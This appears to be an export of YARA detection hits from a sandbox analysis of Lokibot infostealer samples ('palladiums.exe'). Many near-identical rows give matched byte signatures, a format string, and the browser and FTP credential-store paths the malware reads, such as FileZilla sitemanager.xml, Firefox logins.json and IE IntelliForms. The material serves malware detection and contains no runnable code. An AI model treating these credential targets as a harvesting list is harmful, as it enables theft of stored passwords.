24.2.palladiums.exe.3a80000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
24.2.palladiums.exe.3a80000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
24.2.palladiums.exe.3a80000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
35.2.palladiums.exe.1340000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
35.2.palladiums.exe.1340000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
35.2.palladiums.exe.1340000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
35.2.palladiums.exe.1340000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
35.2.palladiums.exe.1340000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
26.2.palladiums.exe.1540000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
26.2.palladiums.exe.1540000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
26.2.palladiums.exe.1540000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
26.2.palladiums.exe.1540000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
26.2.palladiums.exe.1540000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.palladiums.exe.3680000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
11.2.palladiums.exe.3680000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.palladiums.exe.3680000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.palladiums.exe.3680000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.palladiums.exe.3680000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.palladiums.exe.3680000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
11.2.palladiums.exe.3680000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.palladiums.exe.3680000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
17.2.palladiums.exe.1830000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
17.2.palladiums.exe.1830000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
17.2.palladiums.exe.1830000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
17.2.palladiums.exe.1830000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
17.2.palladiums.exe.1830000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.palladiums.exe.14d0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
15.2.palladiums.exe.14d0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
15.2.palladiums.exe.14d0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.palladiums.exe.14d0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
15.2.palladiums.exe.14d0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
15.2.palladiums.exe.14d0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
15.2.palladiums.exe.14d0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.palladiums.exe.14d0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
34.2.palladiums.exe.18f0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
34.2.palladiums.exe.18f0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
34.2.palladiums.exe.18f0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
34.2.palladiums.exe.18f0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
34.2.palladiums.exe.18f0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
34.2.palladiums.exe.18f0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
34.2.palladiums.exe.18f0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
34.2.palladiums.exe.18f0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.palladiums.exe.37a0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.palladiums.exe.37a0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.palladiums.exe.37a0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.palladiums.exe.37a0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
2.2.palladiums.exe.37a0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.palladiums.exe.e30000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.palladiums.exe.e30000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.palladiums.exe.e30000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.palladiums.exe.e30000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.palladiums.exe.e30000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
28.2.palladiums.exe.31e0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
28.2.palladiums.exe.31e0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
28.2.palladiums.exe.31e0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
28.2.palladiums.exe.31e0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
28.2.palladiums.exe.31e0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
28.2.palladiums.exe.31e0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
28.2.palladiums.exe.31e0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
28.2.palladiums.exe.31e0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
33.2.palladiums.exe.1670000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
33.2.palladiums.exe.1670000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
33.2.palladiums.exe.1670000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
33.2.palladiums.exe.1670000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
33.2.palladiums.exe.1670000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
33.2.palladiums.exe.1670000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
33.2.palladiums.exe.1670000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
33.2.palladiums.exe.1670000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
22.2.palladiums.exe.3830000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
22.2.palladiums.exe.3830000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
22.2.palladiums.exe.3830000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
22.2.palladiums.exe.3830000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
22.2.palladiums.exe.3830000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
22.2.palladiums.exe.3830000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
22.2.palladiums.exe.3830000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
22.2.palladiums.exe.3830000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
37.2.palladiums.exe.2ee0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
37.2.palladiums.exe.2ee0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
37.2.palladiums.exe.2ee0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
37.2.palladiums.exe.2ee0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
37.2.palladiums.exe.2ee0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
29.2.palladiums.exe.4130000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
29.2.palladiums.exe.4130000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
29.2.palladiums.exe.4130000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
29.2.palladiums.exe.4130000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
29.2.palladiums.exe.4130000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.Dhy2kmz.exe.3ec4318.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
19.2.palladiums.exe.3990000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
19.2.palladiums.exe.3990000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
19.2.palladiums.exe.3990000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
19.2.palladiums.exe.3990000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
19.2.palladiums.exe.3990000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
21.2.palladiums.exe.3b50000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
21.2.palladiums.exe.3b50000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
21.2.palladiums.exe.3b50000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.palladiums.exe.3b50000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
21.2.palladiums.exe.3b50000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
21.2.palladiums.exe.3b50000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
21.2.palladiums.exe.3b50000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
21.2.palladiums.exe.3b50000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
16.2.palladiums.exe.1570000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
16.2.palladiums.exe.1570000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
16.2.palladiums.exe.1570000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
16.2.palladiums.exe.1570000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
16.2.palladiums.exe.1570000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
18.2.palladiums.exe.f20000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
18.2.palladiums.exe.f20000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
18.2.palladiums.exe.f20000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
18.2.palladiums.exe.f20000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
18.2.palladiums.exe.f20000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.Dhy2kmz.exe.458c248.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
15.2.palladiums.exe.14d0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
15.2.palladiums.exe.14d0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
15.2.palladiums.exe.14d0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
15.2.palladiums.exe.14d0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
15.2.palladiums.exe.14d0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
19.2.palladiums.exe.3990000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
19.2.palladiums.exe.3990000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
19.2.palladiums.exe.3990000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.2.palladiums.exe.3990000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
19.2.palladiums.exe.3990000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
19.2.palladiums.exe.3990000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
19.2.palladiums.exe.3990000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
19.2.palladiums.exe.3990000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
22.2.palladiums.exe.3830000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
22.2.palladiums.exe.3830000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
22.2.palladiums.exe.3830000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
